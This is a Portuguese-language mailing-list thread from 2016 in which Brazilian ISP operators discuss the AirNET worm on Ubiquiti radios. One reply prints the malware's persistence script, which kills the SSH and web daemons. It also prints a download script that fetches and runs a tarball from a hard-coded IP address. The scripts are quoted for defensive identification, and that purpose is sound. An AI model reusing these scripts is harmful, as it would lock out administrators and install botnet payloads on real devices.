[GTER] RES: Vírus ubnt

Alexandre J. Correa (Onda) alexandre at onda.net.br
Thu Oct 13 12:37:11 -03 2016


Ele não deixa SSH nem WEB..  digamos que o worm é hardcore eheheheh...

Ele captura senhas na rede, tem todo um processo de captura etc... por 
isso ele entra em radios mesmo sem vulnerabilidade...


Em 13/10/2016 11:06, Emerson Araujo escreveu:
> Alexandre, conseguiu identificar pra qual senha/usuario ele altera? Ou é
> aleatório?
>
> Em 13 de outubro de 2016 10:51, Márcio Elias Hahn do Nascimento <
> marcio at sulonline.net> escreveu:
>
>>
>> Obrigado pelas informações Alexandre.
>>
>> Realmente não tive nenhum
>> equipamento com esse problema.
>>
>> Versões entre 4x (equipamentos beem
>> antigos antes da linha MiMo, poucos, mais tem...) e todos os tipos de
>> 5.x (embora a grande maioria seja 5.6.6).
>>
>> Detalhe.
>>
>> Todas as portas
>> entre 0-1024 estão fechadas para o mundo e abertas apenas para uma rede
>> de gerência.
>>
>> ---
>>
>> Att
>>
>> Márcio Elias Hahn do Nascimento
>> (48) 8469-1819
>> / 3524-0700 - marcio at sulonline.net
>> INOC-BR: 52977*100
>> GERÊNCIA DE
>> RECURSOS DE TIC - Sul Internet [5]
>>
>>   [5]
>>
>> Em 13/10/2016 10:21,
>> Alexandre J. Correa (Onda) escreveu:
>>
>>> no /etc/persistent/ deve conter
>> alguns arquivos, por exemplo o rc.poststart
>>> que contem:
>>>
>>>
>> owned() {
>>> sleep 10
>>> kill -HUP 1 1>/dev/null 2>/dev/null
>>> kill -9
>> `pidof lighttpd dropbear` 1>/dev/null 2>/dev/null
>>> }
>>>
>>>
>> /var/etc/persistent/AirNET init
>>> ( owned ) &
>>>
>>> há um arquivo chamado
>> porra.sh também, que é por onde ele baixa o 'kit'
>>> e executa a
>> instalação:
>>> #!/bin/sh
>>>
>>> rm -rf /tmp/AirNET*
>>> wget -q
>> http://5.196.50.44/mips/AirNET.tgz [4]-O /tmp/AirNET.tgz
>>> if [ -f
>> "/tmp/AirNET.tgz" ]; then
>>> mkdir -p /tmp/AirNET
>>> tar xzf
>> /tmp/AirNET.tgz -C /tmp/AirNET
>>> rm -rf /tmp/AirNET.tgz
>>> cd
>> /tmp/AirNET
>>> sh install.sh
>>> else
>>> echo "error: wget"
>>> fi
>>> rm -rf
>> /tmp/AirNET*
>>> Esta variante o desenvolvedor foi mais inteligente,
>> ele compilou o
>>> daemon, dificultando a identificação do que ele faz...
>> consegui
>>> decodificar e ele entra em uma rede de IRC e provavelmente
>> recebe
>>> comandos pelo IRC mesmo. Imagino que o cara deva ter uma
>> botnet grande !!!
>>> Em 13/10/2016 09:56, Márcio Elias Hahn do
>> Nascimento escreveu:
>>>> Pessoal, a discussão está muito dispersa e
>> com muitas informações desencontradas. Qual a assinatura desse vírus?
>> (como eu digo que um equipamento está ou não infectado? Arquivos
>> alterados/criados, perda de acesso, alteração de portas, etc). O ideal
>> seria um posicionamento definitivo sobre isso. Outra, sobre a versão
>> segura ou não, é utopia, segurança da informação não existe a nível de
>> 100%, então chego a 2 conclusões. 1 - Não vou sair atualizando milhares
>> de equipamentos. 2 - Vou tratar de fechar a porta para não entrar quem
>> não deve. --- Att Márcio Elias Hahn do Nascimento (48) 8469-1819 /
>> 3524-0700 - marcio at sulonline.netINOC-BR: 52977*100 GERÊNCIA DE RECURSOS
>> DE TIC - Sul Internet [3] [3] Em 13/10/2016 08:43, Adriano B. Lima
>> escreveu:
>>>>>> Há um novo virus, chamado AirNET, ele consegue
>> capturar as senhas
>>>> digitadas.. e utliza além da senhas padrões, as
>> senhas capturadas para acesso aos radios.. ele bloqueia ssh e web...
>> somente reset para remover... Fwd: a
>>>>> Alexandre, resetando o
>> equipamento limpa este
>>>> vírus ou é preciso algum procedimento de
>> remoção? Outra pergunta, as versões 5.6.9 também estão
>> alexandre at onda.net.br> escreveu:
>> https://eng.registro.br/mailman/listinfo/gter[1] -- gter list
>> http://www.sulinternet.net [3] -- gter list
>> https://eng.registro.br/mailman/listinfo/gter [2]
>>> --
>>>
>> Fwd: a
>>> *Alexandre Jeronimo Correa* / CEO
>>> _alexandre at onda.net.br
>> <mailto:alexandre at onda.net.br>_ / Office +55 34
>>> 3351 - 3077
>>>
>>>
>> *ONDA INTERNET*
>>> +55 34 3351-3077
>>> Av. Benedito Valadares, 217 -
>> Centro - Sacramento - MG - BR
>>> _http://www.onda.net.br
>> <http://www.onda.net.br/ [1]>_
>>> --
>>> gter list
>> https://eng.registro.br/mailman/listinfo/gter [2]
>>
>>
>> Links:
>> ------
>> [1]
>> http://www.onda.net.br/
>> [2]
>> https://eng.registro.br/mailman/listinfo/gter
>> [3]
>> https://eng.registro.br/mailman/listinfo/g<div>
>>
>> > ng.registro.br/mailman/listinfo/gter"&
>> gt;https://eng.registro.br/mailman/listinfo/gter [2http://ww
>> </div>/</a>[3]<ahref=
>> [4]
>> http://5.196.50.44/mips/AirNET.tgz
>> [5] http://www.sulinternet.net
>> --
>> gter list    https://eng.registro.br/mailman/listinfo/gter
>>
>
>


-- 
Fwd: a

	


	

*Alexandre Jeronimo Correa* / CEO
_alexandre at onda.net.br <mailto:alexandre at onda.net.br>_ / Office +55 34 
3351 - 3077

*ONDA INTERNET*
+55 34 3351-3077
Av. Benedito Valadares, 217 – Centro – Sacramento – MG - BR
_http://www.onda.net.br <http://www.onda.net.br/>_





More information about the gter mailing list